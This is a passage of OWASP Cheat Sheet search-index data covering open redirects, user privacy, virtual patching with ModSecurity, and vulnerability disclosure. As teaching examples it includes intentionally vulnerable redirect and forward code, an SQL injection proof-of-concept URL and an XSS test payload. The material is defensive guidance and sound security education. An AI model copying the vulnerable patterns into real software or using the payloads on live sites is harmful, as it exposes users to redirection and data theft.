The user sees the link directing to the original trusted site (example.com) and does not realize the redirection that could take place

"},{"location":"cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html#dangerous-url-redirect-example-2","title":"Dangerous URL Redirect Example 2","text":"

ASP .NET MVC 1 & 2 websites are particularly vulnerable to open redirection attacks. In order to avoid this vulnerability, you need to apply MVC 3.

The code for the LogOn action in an ASP.NET MVC 2 application is shown below. After a successful login, the controller returns a redirect to the returnUrl. You can see that no validation is being performed against the returnUrl parameter.

ASP.NET MVC 2 LogOn action in AccountController.cs (see Microsoft Docs link provided above for the context):

[HttpPost]\npublic ActionResult LogOn(LogOnModel model, string returnUrl)\n{\nif (ModelState.IsValid)\n{\nif (MembershipService.ValidateUser(model.UserName, model.Password))\n{\nFormsService.SignIn(model.UserName, model.RememberMe);\nif (!String.IsNullOrEmpty(returnUrl))\n{\nreturn Redirect(returnUrl);\n}\nelse\n{\nreturn RedirectToAction(\"Index\", \"Home\");\n}\n}\nelse\n{\nModelState.AddModelError(\"\", \"The user name or password provided is incorrect.\");\n}\n}\n\n// If we got this far, something failed, redisplay form\nreturn View(model);\n}\n
"},{"location":"cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html#dangerous-forward-example","title":"Dangerous Forward Example","text":"

When applications allow user input to forward requests between different parts of the site, the application must check that the user is authorized to access the URL, perform the functions it provides, and it is an appropriate URL request.

If the application fails to perform these checks, an attacker crafted URL may pass the application's access control check and then forward the attacker to an administrative function that is not normally permitted.

Example:

http://www.example.com/function.jsp?fwd=admin.jsp\n

The following code is a Java servlet that will receive a GET request with a URL parameter named fwd in the request to forward to the address specified in the URL parameter. The servlet will retrieve the URL parameter value from the request and complete the server-side forward processing before responding to the browser.

public class ForwardServlet extends HttpServlet\n{\nprotected void doGet(HttpServletRequest request, HttpServletResponse response)\nthrows ServletException, IOException {\nString query = request.getQueryString();\nif (query.contains(\"fwd\"))\n{\nString fwd = request.getParameter(\"fwd\");\ntry\n{\nrequest.getRequestDispatcher(fwd).forward(request, response);\n}\ncatch (ServletException e)\n{\ne.printStackTrace();\n}\n}\n}\n}\n
"},{"location":"cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html#preventing-unvalidated-redirects-and-forwards","title":"Preventing Unvalidated Redirects and Forwards","text":"

Safe use of redirects and forwards can be done in a number of ways:

"},{"location":"cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html#validating-urls","title":"Validating URLs","text":"

Validating and sanitising user-input to determine whether the URL is safe is not a trivial task. Detailed instructions how to implement URL validation is described in Server Side Request Forgery Prevention Cheat Sheet

"},{"location":"cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/User_Privacy_Protection_Cheat_Sheet.html","title":"User Privacy Protection Cheat Sheet","text":""},{"location":"cheatsheets/User_Privacy_Protection_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This OWASP Cheat Sheet introduces mitigation methods that web developers may utilize in order to protect their users from a vast array of potential threats and aggressions that might try to undermine their privacy and anonymity. This cheat sheet focuses on privacy and anonymity threats that users might face by using online services, especially in contexts such as social networking and communication platforms.

"},{"location":"cheatsheets/User_Privacy_Protection_Cheat_Sheet.html#guidelines","title":"Guidelines","text":""},{"location":"cheatsheets/User_Privacy_Protection_Cheat_Sheet.html#strong-cryptography","title":"Strong Cryptography","text":"

Any online platform that handles user identities, private information or communications must be secured with the use of strong cryptography. User communications must be encrypted in transit and storage. User secrets such as passwords must also be protected using strong, collision-resistant hashing algorithms with increasing work factors, in order to greatly mitigate the risks of exposed credentials as well as proper integrity control.

To protect data in transit, developers must use and adhere to TLS/SSL best practices such as verified certificates, adequately protected private keys, usage of strong ciphers only, informative and clear warnings to users, as well as sufficient key lengths. Private data must be encrypted in storage using keys with sufficient lengths and under strict access conditions, both technical and procedural. User credentials must be hashed regardless of whether or not they are encrypted in storage.

For detailed guides about strong cryptography and best practices, read the following OWASP references:

  1. Cryptographic Storage Cheat Sheet.
  2. Authentication Cheat Sheet.
  3. Transport Layer Protection Cheat Sheet.
  4. Guide to Cryptography.
  5. Testing for TLS/SSL.
"},{"location":"cheatsheets/User_Privacy_Protection_Cheat_Sheet.html#support-http-strict-transport-security","title":"Support HTTP Strict Transport Security","text":"

HTTP Strict Transport Security (HSTS) is an HTTP header set by the server indicating to the user agent that only secure (HTTPS) connections are accepted, prompting the user agent to change all insecure HTTP links to HTTPS, and forcing the compliant user agent to fail-safe by refusing any TLS/SSL connection that is not trusted by the user.

HSTS has average support on popular user agents, such as Mozilla Firefox and Google Chrome. Nevertheless, it remains very useful for users who are in consistent fear of spying and Man in the Middle Attacks.

If it is impractical to force HSTS on all users, web developers should at least give users the choice to enable it if they wish to make use of it.

For more details regarding HSTS, please visit:

  1. HTTP Strict Transport Security in Wikipedia.
  2. IETF for HSTS RFC.
  3. OWASP Appsec Tutorial Series - Episode 4: Strict Transport Security.
"},{"location":"cheatsheets/User_Privacy_Protection_Cheat_Sheet.html#digital-certificate-pinning","title":"Digital Certificate Pinning","text":"

Certificate Pinning is the practice of hardcoding or storing a predefined set of information (usually hashes) for digital certificates/public keys in the user agent (be it web browser, mobile app or browser plugin) such that only the predefined certificates/public keys are used for secure communication, and all others will fail, even if the user trusted (implicitly or explicitly) the other certificates/public keys.

Some advantages for pinning are:

For details regarding certificate pinning, please refer to the following:

  1. OWASP Certificate Pinning Cheat Sheet.
  2. Public Key Pinning Extension for HTTP RFC.
  3. Securing the SSL channel against man-in-the-middle attacks: Future technologies - HTTP Strict Transport Security and Pinning of Certs, by Tobias Gondrom.
"},{"location":"cheatsheets/User_Privacy_Protection_Cheat_Sheet.html#panic-modes","title":"Panic Modes","text":"

A panic mode is a mode that threatened users can refer to when they fall under direct threat to disclose account credentials.

Giving users the ability to create a panic mode can help them survive these threats, especially in tumultuous regions around the world. Unfortunately many users around the world are subject to types of threats that most web developers do not know of or take into account.

Examples of panic modes are modes where distressed users can delete their data upon threat, log into fake inboxes/accounts/systems, or invoke triggers to backup/upload/hide sensitive data.

The appropriate panic mode to implement differs depending on the application type. A disk encryption software such as VeraCrypt might implement a panic mode that starts up a fake system partition if the user entered their distressed password.

Email providers might implement a panic mode that hides predefined sensitive emails or contacts, allowing reading innocent email messages only, usually as defined by the user, while preventing the panic mode from overtaking the actual account.

An important note about panic modes is that they must not be easily discoverable, if at all. An adversary inside a victim's panic mode must not have any way, or as few possibilities as possible, of finding out the truth. This means that once inside a panic mode, most non-sensitive normal operations must be allowed to continue (such as sending or receiving email), and that further panic modes must be possible to create from inside the original panic mode (If the adversary tried to create a panic mode on a victim's panic mode and failed, the adversary would know they were already inside a panic mode, and might attempt to hurt the victim).

Another solution would be to prevent panic modes from being generated from the user account, and instead making it a bit harder to spoof by adversaries. For example it could be only created Out Of Band, and adversaries must have no way to know a panic mode already exists for that particular account.

The implementation of a panic mode must always aim to confuse adversaries and prevent them from reaching the actual accounts/sensitive data of the victim, as well as prevent the discovery of any existing panic modes for a particular account.

For more details regarding VeraCrypt's hidden operating system mode, please refer to:

"},{"location":"cheatsheets/User_Privacy_Protection_Cheat_Sheet.html#remote-session-invalidation","title":"Remote Session Invalidation","text":"

In case user equipment is lost, stolen or confiscated, or under suspicion of cookie theft; it might be very beneficial for users to able to see view their current online sessions and disconnect/invalidate any suspicious lingering sessions, especially ones that belong to stolen or confiscated devices. Remote session invalidation can also helps if a user suspects that their session details were stolen in a Man-in-the-Middle attack.

For details regarding session management, please refer to:

"},{"location":"cheatsheets/User_Privacy_Protection_Cheat_Sheet.html#allow-connections-from-anonymity-networks","title":"Allow Connections from Anonymity Networks","text":"

Anonymity networks, such as the Tor Project, give users in tumultuous regions around the world a golden chance to escape surveillance, access information or break censorship barriers. More often than not, activists in troubled regions use such networks to report injustice or send uncensored information to the rest of the world, especially mediums such as social networks, media streaming websites and email providers.

Web developers and network administrators must pursue every avenue to enable users to access services from behind such networks, and any policy made against such anonymity networks need to be carefully re-evaluated with respect to impact on people around the world.

If possible, application developers should try to integrate or enable easy coupling of their applications with these anonymity networks, such as supporting SOCKS proxies or integration libraries (e.g. OnionKit for Android).

For more information about anonymity networks, and the user protections they provide, please refer to:

  1. The Tor Project.
  2. I2P Network.
  3. OnionKit: Boost Network Security and Encryption in your Android Apps.
"},{"location":"cheatsheets/User_Privacy_Protection_Cheat_Sheet.html#prevent-ip-address-leakage","title":"Prevent IP Address Leakage","text":"

Preventing leakage of user IP addresses is of great significance when user protection is in scope. Any application that hosts external third-party content, such as avatars, signatures or photo attachments; must take into account the benefits of allowing users to block third-party content from being loaded in the application page.

If it was possible to embed 3rd-party, external domain images, for example, in a user's feed or timeline; an adversary might use it to discover a victim's real IP address by hosting it on his domain and watch for HTTP requests for that image.

Many web applications need user content to operate, and this is completely acceptable as a business process; however web developers are advised to consider giving users the option of blocking external content as a precaution. This applies mainly to social networks and forums, but can also apply to web-based e-mail, where images can be embedded in HTML-formatted emails.

A similar issue exists in HTML-formatted emails that contain third-party images, however most email clients and providers block loading of third-party content by default; giving users better privacy and anonymity protection.

"},{"location":"cheatsheets/User_Privacy_Protection_Cheat_Sheet.html#honesty-transparency","title":"Honesty & Transparency","text":"

If the web application cannot provide enough legal or political protections to the user, or if the web application cannot prevent misuse or disclosure of sensitive information such as logs, the truth must be told to the users in a clear understandable form, so that users can make an educated choice about whether or not they should use that particular service.

If it doesn't violate the law, inform users if their information is being requested for removal or investigation by external entities.

Honesty goes a long way towards cultivating a culture of trust between a web application and its users, and it allows many users around the world to weigh their options carefully, preventing harm to users in various contrasting regions around the world.

More insight regarding secure logging can be found at:

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html","title":"Virtual Patching Cheat Sheet","text":""},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#introduction","title":"Introduction","text":"

The goal with this cheat Sheet is to present a concise virtual patching framework that organizations can follow to maximize the timely implementation of mitigation protections.

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#definition-virtual-patching","title":"Definition: Virtual Patching","text":"

A security policy enforcement layer which prevents and reports the exploitation attempt of a known vulnerability.

The virtual patch works when the security enforcement layer analyzes transactions and intercepts attacks in transit, so malicious traffic never reaches the web application. The resulting impact of virtual patching is that, while the actual source code of the application itself has not been modified, the exploitation attempt does not succeed.

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#why-not-just-fix-the-code","title":"Why Not Just Fix the Code","text":"

From a purely technical perspective, the number one remediation strategy would be for an organization to correct the identified vulnerability within the source code of the web application. This concept is universally agreed upon by both web application security experts and system owners. Unfortunately, in real world business situations, there arise many scenarios where updating the source code of a web application is not easy such as:

The important point is this - Code level fixes and Virtual Patching are NOT mutually exclusive. They are processes that are executed by different team (OWASP Builders/Devs vs. OWASP Defenders/OpSec) and can be run in tandem.

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#value-of-virtual-patching","title":"Value of Virtual Patching","text":"

The two main goals of Virtual Patching are:

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#virtual-patching-tools","title":"Virtual Patching Tools","text":"

Notice that the definition above did not list any specific tool as there are a number of different options that may be used for virtual patching efforts such as:

For example purposes, we will show virtual patching examples using the open source ModSecurity WAF tool.

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#a-virtual-patching-methodology","title":"A Virtual Patching Methodology","text":"

Virtual Patching, like most other security processes, is not something that should be approached haphazardly. Instead, a consistent, repeatable process should be followed that will provide the best chances of success. The following virtual patching workflow mimics the industry accepted practice for conducting IT Incident Response and consists of the following phases:

  1. Preparation.
  2. Identification.
  3. Analysis.
  4. Virtual Patch Creation.
  5. Implementation/Testing.
  6. Recovery/Follow Up.
"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#example-public-vulnerability","title":"Example Public Vulnerability","text":"

Let's take the following SQL Injection vulnerability as our example for the remainder of this article:

WordPress Shopping Cart Plugin for WordPress\n/wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php\nreqID Parameter prone to SQL Injection.\n

Description:

WordPress Shopping Cart Plugin for WordPress contains a flaw that may allow an attacker to carry out an SQL injection attack.

The issue is due to the /wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php script not properly sanitizing user-supplied input to the reqID parameter.

This may allow an attacker to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data.

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#preparation-phase","title":"Preparation Phase","text":"

The importance of properly utilizing the preparation phase with regards to virtual patching cannot be overstated. You need to do a number of things to setup the virtual patching processes and framework prior to actually having to deal with an identified vulnerability, or worse yet, react to a live web application intrusion. The point is that during a live compromise is not the ideal time to be proposing installation of a web application firewall and the concept of a virtual patch. Tension is high during real incidents and time is of the essence, so lay the foundation of virtual patching when the waters are calm and get everything in place and ready to go when an incident does occur.

Here are a few critical items that should be addressed during the preparation phase:

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#identification-phase","title":"Identification Phase","text":"

The Identification Phase occurs when an organization becomes aware of a vulnerability within their web application. There are generally two different methods of identifying vulnerabilities: Proactive and Reactive.

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#proactive-identification","title":"Proactive Identification","text":"

This occurs when an organization takes it upon themselves to assess their web security posture and conducts the following tasks:

Due to the fact that custom coded web applications are unique, these proactive identification tasks are extremely important as you are not able to rely upon third-party vulnerability notifications.

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#reactive-identification","title":"Reactive Identification","text":"

There are three main reactive methods for identifying vulnerabilities:

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#analysis-phase","title":"Analysis Phase","text":"

Here are the recommended steps to start the analysis phase:

  1. Determine Virtual Patching Applicability - Virtual patching is ideally suited for injection-type flaws but may not provide an adequate level of attack surface reduction for other attack types or categories. Thorough analysis of the underlying flaw should be conducted to determine if the virtual patching tool has adequate detection logic capabilities.
  2. Utilize Bug Tracking/Ticketing System - Enter the vulnerability information into a bug tracking system for tracking purposes and metrics. Recommend you use ticketing systems you already use such as Jira or you may use a specialized tool such as ThreadFix.
  3. Verify the name of the vulnerability - This means that you need to have the proper public vulnerability identifier (such as CVE name/number) specified by the vulnerability announcement, vulnerability scan, etc. If the vulnerability is identified proactively rather than through public announcements, then you should assign your own unique identifier to each vulnerability.
  4. Designate the impact level - It is always important to understand the level of criticality involved with a web vulnerability. Information leakages may not be treated in the same manner as an SQL Injection issue.
  5. Specify which versions of software are impacted - You need to identify what versions of software are listed so that you can determine if the version(s) you have installed are affected.
  6. List what configuration is required to trigger the problem - Some vulnerabilities may only manifest themselves under certain configuration settings.
  7. List Proof of Concept (PoC) exploit code or payloads used during attacks/testing - Many vulnerability announcements have accompanying exploit code that shows how to demonstrate the vulnerability. If this data is available, make sure to download it for analysis. This will be useful later on when both developing and testing the virtual patch.
"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#virtual-patch-creation-phase","title":"Virtual Patch Creation Phase","text":"

The process of creating an accurate virtual patch is bound by two main tenants:

  1. No false positives - Do not ever block legitimate traffic under any circumstances.
  2. No false negatives - Do not ever miss attacks, even when the attacker intentionally tries to evade detection.

Care should be taken to attempt to minimize either of these two rules. It may not be possible to adhere 100% to each of these goals but remember that virtual patching is about Risk Reduction. It should be understood by business owners that while you are gaining the advantage of shortening the Time-to-Fix metric, you may not be implementing a complete fix for the flaw.

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#manual-virtual-patch-creation","title":"Manual Virtual Patch Creation","text":""},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#positive-security-allow-list-virtual-patches-recommended-solution","title":"Positive Security (Allow List) Virtual Patches (Recommended Solution)","text":"

Positive security model (allow list) is a comprehensive security mechanism that provides an independent input validation envelope to an application. The model specifies the characteristics of valid input (character set, length, etc\u2026) and denies anything that does not conform. By defining rules for every parameter in every page in the application the application is protected by an additional security envelop independent from its code.

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#example-allow-list-modsecurity-virtual-patch","title":"Example Allow List ModSecurity Virtual Patch","text":"

In order to create an allow-list virtual patch, you must be able to verify what the normal, expected input values are. If you have implemented proper audit logging as part of the Preparation Phase, then you should be able to review audit logs to identify the format of expected input types. In this case, the reqID parameter is supposed to only hold integer characters so we can use this virtual patch:

##\n## Verify we only receive 1 parameter called \"reqID\"\n##\nSecRule REQUEST_URI \"@contains /wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php\" \"chain,id:1,phase:2,t:none,t:Utf8toUnicode,t:urlDecodeUni,t:normalizePathWin,t:lowercase,block,msg:'Input Validation Error for \\'reqID\\' parameter - Duplicate Parameters Names Seen.',logdata:'%{matched_var}'\"\n  SecRule &ARGS:/reqID/ \"!@eq 1\"\n\n##\n## Verify reqID's payload only contains integers\n##\nSecRule REQUEST_URI \"@contains /wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php\" \"chain,id:2,phase:2,t:none,t:Utf8toUnicode,t:urlDecodeUni,t:normalizePathWin,t:lowercase,block,msg:'Input Validation Error for \\'reqID\\' parameter.',logdata:'%{args.reqid}'\"\n  SecRule ARGS:/reqID/ \"!@rx ^[0-9]+$\"\n

This virtual patch will inspect the reqID parameter value on the specified page and prevent any characters other than integers as input.

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#negative-security-block-list-virtual-patches","title":"Negative Security (Block List) Virtual Patches","text":"

A negative security model (block list) is based on a set of rules that detect specific known attacks rather than allow only valid traffic.

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#example-block-list-modsecurity-virtual-patch","title":"Example Block List ModSecurity Virtual Patch","text":"

Here is the example PoC code that was supplied by the public advisory:

http://localhost/wordpress/wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php?reqID=1' or 1='1\n

Looking at the payload, we can see that the attacker is inserting a single quote character and then adding additional SQL query logic to the end. Based on this data, we could disallow the single quote character like this:

SecRule REQUEST_URI \"@contains /wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php\" \"chain,id:1,phase:2,t:none,t:Utf8toUnicode,t:urlDecodeUni,t:normalizePathWin,t:lowercase,block,msg:'Input Validation Error for \\'reqID\\' parameter.',logdata:'%{args.reqid}'\"\n  SecRule ARGS:/reqID/ \"@pm '\"\n
"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#which-method-is-better-for-virtual-patching-positive-or-negative-security","title":"Which Method is Better for Virtual Patching \u2013 Positive or Negative Security","text":"

A virtual patch may employ either a positive or negative security model. Which one you decide to use depends on the situation and a few different considerations. For example, negative security rules can usually be implemented more quickly, however the possible evasions are more likely.

Positive security rules, only the other hand, provides better protection however it is often a manual process and thus is not scalable and difficult to maintain for large/dynamic sites. While manual positive security rules for an entire site may not be feasible, a positive security model can be selectively employed when a vulnerability alert identifies a specific location with a problem.

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#beware-of-exploit-specific-virtual-patches","title":"Beware of Exploit-Specific Virtual Patches","text":"

You want to resist the urge to take the easy road and quickly create an exploit-specific virtual patch.

For instance, if an authorized penetration test identified an XSS vulnerability on a page and used the following attack payload in the report:

<script>\nalert('XSS Test')\n</script>\n

It would not be wise to implement a virtual patch that simply blocks that exact payload. While it may provide some immediate protection, its long term value is significantly decreased.

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#automated-virtual-patch-creation","title":"Automated Virtual Patch Creation","text":"

Manual patch creation may become unfeasible as the number of vulnerabilities grow and automated means may become necessary. If the vulnerabilities were identified using automated tools and an XML report is available, it is possible to leverage automated processes to auto-convert this vulnerability data into virtual patches for protection systems.

Three examples include:

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#implementationtesting-phase","title":"Implementation/Testing Phase","text":"

In order to accurately test out the newly created virtual patches, it may be necessary to use an application other than a web browser. Some useful tools are:

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#testing-steps","title":"Testing Steps","text":""},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#recoveryfollow-up-phase","title":"Recovery/Follow-Up Phase","text":""},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html","title":"Vulnerability Disclosure Cheat Sheet","text":""},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This cheat sheet is intended to provide guidance on the vulnerability disclosure process for both security researchers and organisations. This is an area where collaboration is extremely important, but that can often result in conflict between the two parties.

Researchers should:

Organisations should:

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#methods-of-disclosure","title":"Methods of Disclosure","text":"

There are a number of different models that can be followed when disclosing vulnerabilities, which are listed in the sections below.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#private-disclosure","title":"Private Disclosure","text":"

In the private disclosure model, the vulnerability is reported privately to the organisation. The organisation may choose to publish the details of the vulnerabilities, but this is done at the discretion of the organisation, not the researcher, meaning that many vulnerabilities may never be made public. The majority of bug bounty programs require that the researcher follows this model.

The main problem with this model is that if the vendor is unresponsive, or decides not to fix the vulnerability, then the details may never be made public. Historically this has lead to researchers getting fed up with companies ignoring and trying to hide vulnerabilities, leading them to the full disclosure approach.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#full-disclosure","title":"Full Disclosure","text":"

With the full disclosure approach, the full details of the vulnerability are made public as soon as they are identified. This means that the full details (sometimes including exploit code) are available to attackers, often before a patch is available. The full disclosure approach is primarily used in response or organisations ignoring reported vulnerabilities, in order to put pressure on them to develop and publish a fix.

This makes the full disclosure approach very controversial, and it is seen as irresponsible by many people. Generally it should only be considered as a last resort, when all other methods have failed, or when exploit code is already publicly available.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#responsible-or-coordinated-disclosure","title":"Responsible or Coordinated Disclosure","text":"

Responsible disclosure attempts to find a reasonable middle ground between these two approaches. With responsible disclosure, the initial report is made privately, but with the full details being published once a patch has been made available (sometimes with a delay to allow more time for the patches to be installed).

In many cases, the researcher also provides a deadline for the organisation to respond to the report, or to provide a patch. If this deadline is not met, then the researcher may adopt the full disclosure approach, and publish the full details.

Google's Project Zero adopts a similar approach, where the full details of the vulnerability are published after 90 days regardless of whether or not the organisation has published a patch.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#reporting-vulnerabilities","title":"Reporting Vulnerabilities","text":"

This section is intended to provide guidance for security researchers on how to report vulnerabilities to organisations.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#warnings-and-legality","title":"Warnings and Legality","text":"

Before carrying out any security research or reporting vulnerabilities, ensure that you know and understand the laws in your jurisdiction. This cheat sheet does not constitute legal advice, and should not be taken as such..

The following points highlight a number of areas that should be considered:

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#finding-contact-details","title":"Finding Contact Details","text":"

The first step in reporting a vulnerability is finding the appropriate person to report it to. Although some organisations have clearly published disclosure policies, many do not, so it can be difficult to find the correct place to report the issue.

Where there is no clear disclosure policy, the following areas may provide contact details:

When reaching out to people who are not dedicated security contacts, request the details for a relevant member of staff, rather than disclosing the vulnerability details to whoever accepts the initial contact (especially over social media).

If it is not possible to contact the organisation directly, a national or sector-based CERT may be able to assist.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#initial-report","title":"Initial Report","text":"

Once a security contact has been identified, an initial report should be made of the details of the vulnerability. Ideally this should be done over an encrypted channel (such as the use of PGP keys), although many organisations do not support this.

The initial report should include:

In many cases, especially in smaller organisations, the security reports may be handled by developers or IT staff who do not have a security background. This means that they may not be familiar with many security concepts or terminology, so reports should be written in clear and simple terms.

It may also be beneficial to provide a recommendation on how the issue could be mitigated or resolved. However, unless the details of the system or application are known, or you are very confident in the recommendation then it may be better to point the developers to some more general guidance (such as an OWASP cheat sheet).

If you are planning to publish the details of the vulnerability after a period of time (as per some responsible disclosure policies), then this should be clearly communicated in the initial email - but try to do so in a tone that doesn't sound threatening to the recipient.

If the organisation does not have an established bug bounty program, then avoid asking about payments or rewards in the initial contact - leave it until the issue has been acknowledged (or ideally fixed). In particular, do not demand payment before revealing the details of the vulnerability. At best this will look like an attempt to scam the company, at worst it may constitute blackmail.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#ongoing-communication","title":"Ongoing Communication","text":"

While simpler vulnerabilities might be resolved solely from the initial report, in many cases there will be a number of emails back and forth between the researcher and the organisation. Especially for more complex vulnerabilities, the developers or administrators may ask for additional information or recommendations on how to resolve the issue. They may also ask for assistance in retesting the issue once a fix has been implemented. Although there is no obligation to carry out this retesting, as long as the request is reasonable then and providing feedback on the fixes is very beneficial.

It may also be necessary to chase up the organisation if they become unresponsive, or if the established deadline for publicly disclosing the vulnerability is approaching. Ensure that this communication stays professional and positive - if the disclosure process becomes hostile then neither party will benefit.

Be patient if it's taking a while for the issue to be resolved. The developers may be under significant pressure from different people within the organisation, and may not be able to be fully open in their communication. Triaging, developing, reviewing, testing and deploying a fix within in an enterprise environment takes significantly more time than most researchers expect, and being constantly hassled for updates just adds another level of pressure on the developers.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#when-to-give-up","title":"When to Give Up","text":"

Despite every effort that you make, some organisations are not interested in security, are impossible to contact, or may be actively hostile to researchers disclosing vulnerabilities. In some cases they may even threaten to take legal action against researchers. When this happens it is very disheartening for the researcher - it is important not to take this personally. When this happens, there are a number of options that can be taken.

There are many organisations who have a genuine interest in security, and are very open and co-operative with security researchers. Unless the vulnerability is extremely serious, it is not worth burning yourself out, or risking your career and livelihood over an organisation who doesn't care.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#publishing","title":"Publishing","text":"

Once a vulnerability has been patched (or not), then a decision needs to be made about publishing the details. This should ideally be done through discussion with the vendor, and at a minimum the vendor should be notified that you intend to publish, and provided with a link to the published details. The disclosure would typically include:

Some organisations may request that you do not publish the details at all, or that you delay publication to allow more time to their users to install security patches. In the interest of maintaining a positive relationship with the organisation, it is worth trying to find a compromise position on this.

Whether to publish working proof of concept (or functional exploit code) is a subject of debate. Some people will view this as a \"blackhat\" move, and will argue that by doing so you are directly helping criminals compromise their users. On the other hand, the code can be used to both system administrators and penetration testers to test their systems, and attackers will be able to develop or reverse engineering working exploit code if the vulnerability is sufficiently valuable.

If you are publishing the details in hostile circumstances (such as an unresponsive organisation, or after a stated period of time has elapsed) then you may face threats and even legal action. Whether there is any legal basis for this will depend on your jurisdiction, and whether you signed any form of non-disclosure agreement with the organisation. Make sure you understand your legal position before doing so.

Note that many bug bounty programs forbid researchers from publishing the details without the agreement of the organisation. If you choose to do so, you may forfeit the bounty or be banned from the platform - so read the rules of the program before publishing.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#receiving-vulnerability-reports","title":"Receiving Vulnerability Reports","text":"

This section is intended to provide guidance for organisations on how to accept and receive vulnerability reports.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#bug-bounty-programs","title":"Bug Bounty Programs","text":"

Bug bounty programs incentivise researchers to identify and report vulnerabilities to organisations by offering rewards. These are usually monetary, but can also be physical items (swag). The process is often managed through a third party such as BugCrowd or HackerOne, who provide mediation between researchers and organisations.

When implementing a bug bounty program, the following areas need to be clearly defined:

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#when-to-implement-a-bug-bounty-program","title":"When to Implement a Bug Bounty Program","text":"

Bug bounty have been adopted by many large organisations such as Microsoft, and are starting to be used outside of the commercial sector, including the US Department of Defense. However, for smaller organisations they can bring significant challenges, and require a substantial investment of time and resources. These challenges can include:

Despite these potential issues, bug bounty programs are a great way to identify vulnerabilities in applications and systems. However, they should only be used by organisations that already have a mature vulnerability disclosure process, supported by strong internal processes to resolve vulnerabilities.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#publishing-contact-details","title":"Publishing Contact Details","text":"

The most important step in the process is providing a way for security researchers to contact your organisation. The easier it is for them to do so, the more likely it is that you'll receive security reports. The following list includes some of the common mechanisms that are used for this - the more of these that you can implement the better:

It is also important to ensure that frontline staff (such as those who monitor the main contact address, web chat and phone lines) are aware of how to handle reports of security issues, and who to escalate these reports to within the organisation.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#providing-reporting-guidelines","title":"Providing Reporting Guidelines","text":"

Alongside the contact details, it is also good to provide some guidelines for researchers to follow when reporting vulnerabilities. These could include:

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#communicating-with-researchers","title":"Communicating With Researchers","text":"

Communication between researchers and organisations is often one of the hardest points of the vulnerability disclosure process, and can easily leave both sides frustrated and unhappy with the process.

The outline below provides an example of the ideal communication process:

Throughout the process, provide regular updates of the current status, and the expected timeline to triage and fix the vulnerability. Even if there is no firm timeline for these, the ongoing communication provides some reassurance that the vulnerability hasn't been forgotten about.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#researchers-demanding-payment","title":"Researchers Demanding Payment","text":"

Some individuals may approach an organisation claiming to have found a vulnerability, and demanding payment before sharing the details. Although these requests may be legitimate, in many cases they are simply scams.

One option is to request that they carry out the disclosure through a mediated bug bounty platform, which can provide a level of protection for both sides, as scammers are unlikely to be willing to use these platforms.

